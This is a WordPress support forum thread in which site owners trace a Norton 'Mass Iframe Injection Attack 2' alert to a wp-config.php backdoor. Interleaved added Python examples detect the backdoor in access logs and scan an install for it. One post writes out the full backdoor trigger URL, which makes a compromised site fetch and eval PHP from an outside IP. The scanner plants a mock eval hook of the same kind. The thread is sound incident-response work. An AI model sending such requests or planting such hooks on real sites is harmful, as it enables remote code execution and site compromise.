My website is Infected with Mass Iframe Injection Attack 2 (21 posts)

  1. tinasilvee
    Member
    Posted 3 years ago #

    when I visit my website: http://www.licagentmumbai.com/

    I get an alert, "Mass Iframe Injection Attack 2", from Norton. I am unable to locate the source so that I can remove the infection.

    I have this problem in almost all my wordpress websites.

    Please help.

    Regards
    Tina

  2. nsathees
    Member
    Posted 3 years ago #

    I scanned your site with http://sitecheck.sucuri.net/scanner/ and it seems all clear. Anyway, I have no faith in Norton AV.

  3. tinasilvee
    Member
    Posted 3 years ago #

    Nsathees, thanks for your help. But when I scan online there is no issue, while when the site is loaded there is an alert "Mass Iframe Injection Attack 2".

    Regards
    Tina

  4. tinasilvee
    Member
    Posted 3 years ago #

    I found out what the problem was. Please do not install the RSS Poster free version on your website; you will end up getting infected with Mass Iframe Injection Attack 2.

    After installing a fresh update, updating all the plugins and changing the theme, I still got the Norton alert Mass Iframe Injection Attack 2 when the site was loaded.

    I believe this plugin has been infected with the virus, and only when you uninstall this plugin will your problem be solved.

    Regards
    Tina

  5. Scott222
    Member
    Posted 3 years ago #

    Hi & Help!

    I built a website with the latest WordPress version; the site is http://www.anchorageradiologist.com, and today the account's antivirus software, Norton/Symantec, alerted the user to a "web attack mass iframe injection attack 2". Two different Windows-based computers were given this warning, but I did not see it on a few other Windows-based computers. I was not able to see the warning on my Mac. I have made sure all my websites have the latest version of WordPress and I have updated all my plugins. I downloaded the files and ran them through Panda Antivirus and nothing was detected. The site was uploaded with FileZilla and my hosting is through 1and1.com.
    I have no idea what to do, so any comments would be greatly appreciated. Thank you so much!

    Stressed to the max

    Scott

  6. afelotreyu
    Member
    Posted 3 years ago #

    Hey Scott,

    So, to my giant surprise, I also had this on my web page. It seems the attack was from yesterday, Nov 3, 2011. I couldn't really find how they dumped the code in it. But the page that nsathees linked to reported the following code:

    [Code moderated as per the Forum Rules. Please use the pastebin]

    At this point, I gave up trying to find it. So I logged in to the admin side directly and did a reinstall of WordPress via the dashboard. Now the page is clean.

    The question now is, how did they get in?
    A

  7. afelotreyu
    Member
    Posted 3 years ago #

    UPDATE!

    My wp-settings.php was compromised with the following function
    http://pastebin.com/YV38tGHE

    After a little digging I found that sys_get_temp_dir() (= /tmp for me) was storing the file wp_inc, which of course contained the bad <script> code.

    Hope that helps some of you, I still need to figure out how they got in.
    A

  8. afelotreyu
    Member
    Posted 3 years ago #

    Sorry Mod, did not see the rules, here is the link:
    http://pastebin.com/YV38tGHE

  9. Scott222
    Member
    Posted 3 years ago #

    Thank you so much! Looks like that did the trick. Do you have any other suggestions to further stop this from occurring in future?

  10. bielefeldt
    Member
    Posted 3 years ago #

    I just had the same issue, Update worked.

    Thanks, that saved the rest of my day...

  11. Scott222
    Member
    Posted 3 years ago #

    This has affected several of my websites; I would update all of your WordPress sites. I hope WordPress is working on finding how they're hacking sites.

  12. afelotreyu
    Member
    Posted 3 years ago #

    Sorry Scott, I am actually just starting to get involved with WordPress and I am not 100% familiar with all the steps to secure a WordPress install; hopefully someone else can help.

    At this point I have modified the permissions on wp-settings.php to read-only. That should stop attackers from adding funny functions to my WP, but it will also stop my WordPress from executing proper updates when run via the Dashboard.

    Again, I still need to figure out how they got in and modified my wp-settings in the first place.

    A

  13. afelotreyu
    Member
    Posted 3 years ago #

    Could someone please tell me what the "/?pingnow=eval" call does?

    I think I found the source of the problem and how other WordPress installs are affected. I have the files and will be linking them soon; I just need to understand what pingnow=eval does.

  14. afelotreyu
    Member
    Posted 3 years ago #

    WordPress Support people, I hope you can find the answer or vulnerability in this post.

    What seems to have happened is that one of my WordPress installs was compromised, from which the attacker modified all wp-settings.php files.

    Here is the log of the "attack"
    http://pastebin.com/dJVztNJ7

    From which I got the following files:

    pp.txt
    just contains an echo 'test'

    tt.txt
    http://pastebin.com/gcX19qe2

    tt.php
    http://pastebin.com/3vXsNLNL

    and 99.php or 999.php is
    http://pastebin.com/K3yuH2z7
    This last file is what causes the overwrite of all wp-settings.php

    Also, to add to the odd stuff, I found a file named upd.php in wp-content. The file contained this:
    http://pastebin.com/1y92Jf0C

    Again, if I can find any more information I will post :)

  15. afelotreyu
    Member
    Posted 3 years ago #

    ARG :( I hate my day right now.. Sorry to the Owner of this post if I may be taking over your original post.

    Anyway, I found where "pingnow" is. It seems the install of WordPress was compromised back in August, which caused the wp-config.php file to be modified, leaving a "backdoor".

    I found the wp-config.php contained a copy of the "wp-config-sample.php" plus 40000 lines of code, of which most were blank, and somewhere in the middle of the file I found this:
    http://pastebin.com/h9zXeFN6

    Long story short: no matter how many times I removed the code from my wp-settings.php, if the permissions are not corrected as well, every time someone requested http://blabla.domain/?pingnow=eval&file=http://91.196.216.20/99.php&pass=33e75ff09dd601bbe69f351039152189 all the wp-settings.php files for all other installs get modified.

    For those of you having this problem, check ALL of your WordPress installs, review the wp-config.php file, and make sure you modify the write permissions on wp-config.php and wp-settings.php.

    Hope that helps, I am now really tired :(
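
The request the post above quotes (`?pingnow=eval&file=...&pass=...`) is straightforward to hunt for in web server access logs. What follows is an added example, not code from the thread or from WordPress: it parses Apache-style "combined" log lines and returns every request carrying a `pingnow` parameter, together with the remote file the backdoor was told to fetch and the password hash that gates it. The sample log lines are constructed for illustration (the stager address and hash are the ones quoted in the post; the client IPs are documentation addresses), and the regex field names are this example's own choice.

```python
"""Find invocations of the '?pingnow=eval&file=...&pass=...' backdoor in
Apache/nginx "combined" access logs.

Added example, not code from the thread or from WordPress.  The log lines
below are constructed; the stager host and hash are the ones quoted in the
thread, the client IPs are RFC 5737 documentation addresses."""
import re
from urllib.parse import urlsplit, parse_qs

# Apache "combined" format: ip ident user [time] "METHOD target PROTO" status bytes ...
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample log.  Lines 1 and 3 mirror the request quoted in the post
# (line 3 with the 'file' argument URL-encoded, as a scanner would send it);
# lines 2 and 4 are ordinary traffic that must not be flagged.
SAMPLE_LOG = """\
203.0.113.7 - - [03/Nov/2011:10:14:02 +0000] "GET /?pingnow=eval&file=http://91.196.216.20/99.php&pass=33e75ff09dd601bbe69f351039152189 HTTP/1.1" 200 15
198.51.100.4 - - [03/Nov/2011:10:14:05 +0000] "GET /index.php HTTP/1.1" 200 8123
203.0.113.7 - - [03/Nov/2011:10:15:40 +0000] "GET /blog/?pingnow=eval&file=http%3A%2F%2F91.196.216.20%2Ftt.php&pass=33e75ff09dd601bbe69f351039152189 HTTP/1.1" 200 15
198.51.100.4 - - [03/Nov/2011:10:16:00 +0000] "GET /?s=pingnow HTTP/1.1" 200 9001
"""


def parse_line(line):
    """Split one access-log line into its fields, or return None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_backdoor_hits(log_text):
    """Return one record per request that carries a 'pingnow' query parameter.

    Matching is keyed on the parameter name rather than a path because the
    thread shows the hook living in wp-config.php, so it answers on any URL of
    the compromised install.  parse_qs percent-decodes values, so the encoded
    'file' argument on line 3 comes back as a plain URL."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        parts = urlsplit(rec['target'])
        qs = parse_qs(parts.query)
        if 'pingnow' not in qs:
            continue  # '?s=pingnow' is a site search: no 'pingnow' key, not a hit
        hits.append({
            'ip': rec['ip'],
            'time': rec['time'],
            'path': parts.path,
            'mode': qs['pingnow'][0],
            'file': qs.get('file', [None])[0],
            'pass_hash': qs.get('pass', [None])[0],
            'status': int(rec['status']),
        })
    return hits


def stager_hosts(hits):
    """Hosts the backdoor was told to fetch code from; worth blocking and searching the logs for."""
    return sorted({urlsplit(h['file']).netloc for h in hits if h['file']})


if __name__ == '__main__':
    found = find_backdoor_hits(SAMPLE_LOG)
    for h in found:
        print(f"{h['time']} {h['ip']} {h['path']} mode={h['mode']} file={h['file']} status={h['status']}")
    print('stager hosts:', stager_hosts(found))
```

A 200 response to one of these requests is the signal that matters: the post says each such request rewrote wp-settings.php on every other install, so the timestamps of the hits bound when those files changed, and the `file` hosts are the addresses to pull the second-stage scripts from for analysis.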

  16. Scott222
    Member
    Posted 3 years ago #

    Hey there, I went and updated all my WordPress files; it pretty much took up most of my day. Will this correct the problem or do I need to do anything additional? The computers that gave the warning now allow the sites to be entered with no problem.

  17. Samuel B
    moderator
    Posted 3 years ago #

  18. afelotreyu
    Member
    Posted 3 years ago #

    Scott, I did the same in all my installs of WordPress, but the one with the actual problem had the issue hidden in the wp-config.php file. As I mentioned in my last post, that file was the one allowing the "attackers" to break all other installs of WordPress, and no matter how many times I updated and reinstalled WordPress on it, the issue was still there. I had to manually fix the problem with wp-config.php.

    To be safe, I would suggest you check all your installs and make sure the wp-config.php file is not infected. If you have a wp-config file with more than 100 lines you may have a problem.

    Again, the infected file has about 4000 lines and somewhere around line 2090 is where I found the pingnow function.

    One thing I noticed about the wp-config file was that the "salt keys" were the same as in the wp-config-sample.php.

    Just be really careful modifying that file, and good luck!
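
The last few posts add up to a checklist of indicators: a wp-config.php padded far beyond 100 lines, a `pingnow`/`eval()` hook in it, salts still set to the wp-config-sample.php placeholder, a wp-settings.php that reads a dropped file out of sys_get_temp_dir(), a stray wp-content/upd.php, and the /tmp/wp_inc payload. The scanner below is an added example, not code from the thread or from WordPress; the indicator list, the read-only remediation and the mock infected install it builds to demonstrate itself are assumptions drawn from the posts, not the actual files behind the pastebin links.

```python
"""Scan a WordPress root for the indicators reported in this thread.

Added example, not code from the thread or from WordPress.  The indicator
list and directory layout are assumptions taken from the posts; the demo
install built by build_demo_install() is constructed test data."""
import os
import re
import stat
import tempfile

MAX_CONFIG_LINES = 100  # the thread's rule of thumb: a real wp-config.php is far shorter
SAMPLE_SALT = 'put your unique phrase here'  # placeholder shipped in wp-config-sample.php
CORE_FILES = ('wp-config.php', 'wp-settings.php')
STRAY_FILES = ('wp-content/upd.php',)
SUSPICIOUS = (
    ('pingnow', re.compile(r'pingnow')),
    ('eval', re.compile(r'\beval\s*\(')),
    ('tmp_include', re.compile(r'sys_get_temp_dir\s*\(')),
    ('obfuscation', re.compile(r'\b(base64_decode|gzinflate|str_rot13)\s*\(')),
)


def scan_install(root):
    """Return (relative path, indicator) pairs; an empty list means nothing was found."""
    findings = []
    for name in CORE_FILES:
        path = os.path.join(root, name)
        if not os.path.isfile(path):
            findings.append((name, 'missing'))
            continue
        with open(path, encoding='utf-8', errors='replace') as fh:
            text = fh.read()
        for label, pattern in SUSPICIOUS:
            if pattern.search(text):
                findings.append((name, label))
        if name == 'wp-config.php':
            if text.count('\n') > MAX_CONFIG_LINES:
                findings.append((name, 'oversized'))
            if SAMPLE_SALT in text:
                findings.append((name, 'sample_salts'))
    for name in STRAY_FILES:
        if os.path.exists(os.path.join(root, name)):
            findings.append((name, 'unexpected_file'))
    return findings


def find_tmp_payloads(tmpdir=None, names=('wp_inc',)):
    """Look for the dropped payload the compromised wp-settings.php reads from the temp dir."""
    tmpdir = tmpdir or tempfile.gettempdir()
    return [os.path.join(tmpdir, n) for n in names if os.path.exists(os.path.join(tmpdir, n))]


def lock_core_files(root):
    """Make wp-config.php and wp-settings.php read-only (0444), as the poster did.
    Returns the resulting permission bits; relax them again before a dashboard update."""
    modes = {}
    for name in CORE_FILES:
        path = os.path.join(root, name)
        os.chmod(path, stat.S_IRUSR | stat.S_IRGRP | stat.S_IROTH)
        modes[name] = stat.S_IMODE(os.stat(path).st_mode)
    return modes


def _write(path, text):
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, 'w', encoding='utf-8') as fh:
        fh.write(text)


def build_demo_install(infected):
    """Create a throwaway directory shaped like a WordPress root (constructed test data).

    With infected=True the files carry a mock of what the thread describes: a
    padded wp-config.php with a pingnow/eval hook and placeholder salts, a
    wp-settings.php that echoes a temp-dir file, and a wp-content/upd.php."""
    root = tempfile.mkdtemp(prefix='wpdemo_')
    config = "<?php\ndefine('DB_NAME', 'wp');\ndefine('AUTH_KEY', 'rAnd0m-unique-value');\n"
    settings = "<?php\n// abridged stand-in for the real core bootstrap\nrequire(ABSPATH . WPINC . '/load.php');\n"
    if infected:
        config = config.replace('rAnd0m-unique-value', SAMPLE_SALT) + '\n' * 300 + \
            "if (isset($_GET['pingnow'])) { eval(file_get_contents($_GET['file'])); } // mock hook\n"
        settings += "$f = sys_get_temp_dir() . '/wp_inc'; if (is_file($f)) echo file_get_contents($f); // mock\n"
        _write(os.path.join(root, 'wp-content', 'upd.php'), '<?php // mock dropper\n')
    _write(os.path.join(root, 'wp-config.php'), config)
    _write(os.path.join(root, 'wp-settings.php'), settings)
    return root


if __name__ == '__main__':
    for label, flag in (('clean', False), ('infected', True)):
        print(label, scan_install(build_demo_install(flag)))
    print('temp payloads:', find_tmp_payloads())
```

Any hit on wp-settings.php should be confirmed by diffing the file against the same release's copy from a fresh download, since that file is core and has no legitimate local edits; wp-config.php has to be read by hand, as the poster did, because it is site-specific. The read-only step is the poster's stop-gap and carries the cost noted earlier in the thread: the dashboard updater cannot write the locked files until the permissions are restored.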

  19. MickeyRoush
    Member
    Posted 3 years ago #

    One thing I noticed about the wp-config file was that the "salt keys" was the same as the wp-config-sample.php.

    The wp-config-sample.php file is not needed and can be removed.

    From looking at your pastebin links, it looks like you got hit with a timthumb vulnerability. Make sure that all of your themes and plugins are updated. Research them to make sure that if any of them use the timthumb script, or any variant thereof, it is updated to the newest secure code.

  20. runway21studios
    Member
    Posted 3 years ago #

    Thank you so much afelotreyu. I've been dealing with a client that claims there is a problem with his site and no one is able to see it except him (he is an international client, so communication is tough).

    I simply searched through the wp-settings.php and found that same code, including the wp_inc. Before, it was showing up as having code in it on a malware scan site. Now it's clean. I also checked other sites and saw that our agency website had it too.

    Very strange because I haven't experienced or seen any unusual activity on either site.

  21. afelotreyu
    Member
    Posted 3 years ago #

    Yes MickeyRoush, it seems in my case I was attacked back in August by the timthumb issue and the attacker left a back door on one of the WordPress installs, which allowed him to execute that new iframe attack last week.

    Anyway, everything else seems fine so far; I am still working on database password changes and stuff like that. Better safe than sorry.

    Good luck to everyone!

Topic Closed
